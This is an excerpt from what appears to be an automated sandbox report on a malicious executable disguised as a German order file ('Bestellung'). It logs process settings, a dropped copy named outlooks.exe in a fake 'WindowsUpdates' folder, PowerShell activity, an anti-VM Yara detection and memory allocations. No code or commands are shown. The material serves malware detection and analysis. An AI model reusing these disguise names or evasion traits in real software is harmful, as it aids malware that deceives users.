                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 5060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 6060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 6190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 7190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: A7C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 9D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: B7C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: C7C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 4660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 4D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 5D40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeMemory allocated: 5E70000 memory reserve | memory write watchJump to behavior
